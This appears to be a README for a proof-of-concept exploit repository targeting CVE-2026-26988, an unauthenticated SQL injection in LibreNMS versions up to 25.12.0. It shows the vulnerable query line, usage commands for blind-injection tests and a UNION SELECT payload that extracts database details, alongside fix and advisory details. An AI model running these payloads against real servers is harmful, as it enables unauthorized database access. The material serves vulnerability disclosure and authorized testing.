![Author](https://img.shields.io/badge/Author-Mohammed%20Idrees%20Banyamer-red)
![Role](https://img.shields.io/badge/Role-Security%20Researcher-blue)
![Country](https://img.shields.io/badge/Country-Jordan-black)
![Platform](https://img.shields.io/badge/Platform-Linux-blue)
![Vulnerability](https://img.shields.io/badge/Vuln-SQL%20Injection-critical)
![CVE](https://img.shields.io/badge/CVE-2026--26988-orange)
![CVSS](https://img.shields.io/badge/CVSS-9.3-critical)
![Status](https://img.shields.io/badge/Exploit-PoC-success)

# CVE-2026-26988 – LibreNMS Unauthenticated SQL Injection PoC

**Unauthenticated SQL Injection** in LibreNMS `ajax_table.php` via IPv6 address search parameter.

- **Affected versions**: LibreNMS ≤ 25.12.0
- **Fixed in**: LibreNMS ≥ 26.1 (commit `15429580baba03ed1dd377bada1bde4b7a1175a1`)
- **CVSS v4.0**: 9.3 Critical  
  `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N`
- **CWE**: CWE-89 (Improper Neutralization of Special Elements used in an SQL Command – SQL Injection)

## Vulnerability Summary

The `address` parameter when `search_type=ipv6` is split on `/` into address and prefix.  
The prefix is **directly concatenated** into an SQL query without escaping:

```php
$sql .= " AND ipv6_prefixlen = '$prefix'";
```

A single quote (`'`) in the prefix part allows breaking out of the string literal → arbitrary SQL injection.

## Attack Flow Diagram

```mermaid
flowchart TD
    A[Attacker] -->|1. HTTP POST to /ajax_table.php| B[LibreNMS Web Server]
    B -->|2. id=address-search & search_type=ipv6| C[Parse address parameter]
    C -->|3. Split on '/' → $address / $prefix| D[Build vulnerable SQL]
    D -->|4. Concatenate: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
    E -->|5. Execute injected query| F[Return results / error / delay]
    F -->|6. Attacker observes response / timing| A

    subgraph "Injection Point"
        D
    end

    style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff
```

## Proof-of-Concept Usage

### Requirements
- Python 3.x
- `requests` library (`pip install requests`)

### Basic Test (Syntax Error / 500)

```bash
python3 exploit.py http://target/librenms --test
```

### Time-Based Blind Confirmation (Recommended)

```bash
python3 exploit.py http://192.168.1.50/librenms --time
```

→ If response takes >5–6 seconds → **vulnerable**

### Boolean-Based Blind Test

```bash
python3 exploit.py http://target/librenms --boolean
```

### Custom Payload Example

```bash
python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "
```

## Files in this Repository

- `exploit.py` .............. Main PoC script (rename from `cve-2026-26988-poc.py` if needed)
- `README.md` ............... This file

## Responsible Disclosure

- Reported: February 2026 (via GitHub Security Advisory)
- Fixed in: commit `15429580baba...` → PR #18777
- Advisory: https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv

## Legal & Ethical Notice

**This proof-of-concept is provided for educational and authorized security testing purposes only.**

Do **NOT** use this code against any system or network without explicit written permission from the owner.  
Unauthorized use may violate laws including (but not limited to) the Computer Fraud and Abuse Act (CFAA) in the US, or equivalent legislation in your country.

Use at your own risk.

---
**Author:** Mohammed Idrees Banyamer  
**Instagram:** [@banyamer_security](https://instagram.com/banyamer_security)  
**Date:** February 20, 2026

